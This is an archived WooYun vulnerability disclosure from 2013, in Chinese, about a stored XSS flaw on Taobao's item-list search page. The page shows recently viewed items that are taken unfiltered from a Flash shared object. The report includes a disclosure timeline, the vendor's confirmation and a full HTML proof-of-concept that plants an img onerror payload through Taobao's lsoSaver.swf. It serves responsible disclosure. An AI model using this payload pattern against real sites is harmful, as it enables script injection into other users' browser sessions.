乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-04-18: 细节已通知厂商并且等待厂商处理中 2013-04-19: 厂商已经确认,细节仅向厂商公开 2013-04-29: 细节向核心白帽子及相关领域专家公开 2013-05-09: 细节向普通白帽子公开 2013-05-19: 细节向实习白帽子公开 2013-06-02: 细节向公众公开
未对输出进行过滤
http://list.taobao.com/itemlist/default.htm搜索页中有一个最近浏览商品的栏目, 从flash的shared objcet中取出数据之间展现,为进行过滤,如果shared objcet存在恶意数据,会造成xss.
<script>function updateLsoSaverStatus(status){ if(status == 2){ document['J_lsoSaver'].save('tb_recent_viewed_items','[{"itemId":"16023262435","pic":"i1%2FT1o4T0Xn4hXXbdPVbb_122616.jpg%22><img src=2 onerror=alert(document.domain)>","price":"15800","title":"%E9%A1%BA%E8%BE%BE%E9%93%B6%E9%B2%B8%E7%81%B5%E6%B6%A6%E9%AB%98%E5%8E%8B%E9%94%85%E5%A4%8D%E5%BA%95%E4%B8%8D%E9%94%88%E9%92%A2%E5%8E%8B%E5%8A%9B%E9%94%85%2024cm%20%E8%B6%85%E5%8E%9A%E9%AB%98%E5%8E%8B%E9%94%85SDF-9624","isDaily":false},{"url":"http%3A%2F%2Fitem.taobao.com%2Fitem.htm%3Fid%3D15621327776","itemId":"15621327776","xid":"","pic":"i2%2FT1q1iGXkpzXXbDQSTb_094946.jpg","price":"8900","itemIdStr":"15621327776","title":"%E4%B8%93%E6%9F%9C%E6%AD%A3%E5%93%81%20%E9%A1%BA%E8%BE%BE20CM%20%E7%BB%84%E5%90%88%E7%9B%96%E5%A4%8D%E5%BA%95%E6%97%A5%E5%BC%8F%E8%92%B8%E9%94%85SDF-8121%E4%B8%8D%E9%94%88%E9%92%A2%E8%92%B8%E7%85%AE%E9%94%85","isDaily":false}]') }}</script>Taobao xss poc<object id="J_lsoSaver" tabindex="-1" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="1" height="1" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab"> <param name="movie" value="http://a.tbcdn.cn/app/tbskip/lsoSaver.swf"> <param name="allowScriptAccess" value="always"> <embed name="J_lsoSaver" src="http://a.tbcdn.cn/app/tbskip/lsoSaver.swf" width="1" height="1" allowscriptaccess="always" type="application/x-shockwave-flash" pluginspage="http://www.adobe.com/go/getflashplayer"></object>
输出过滤
危害等级:中
漏洞Rank:6
确认时间:2013-04-19 13:12
感谢您对我们的关注与支持,该漏洞我们会尽快修复~~稍后会有礼物送出~~
暂无
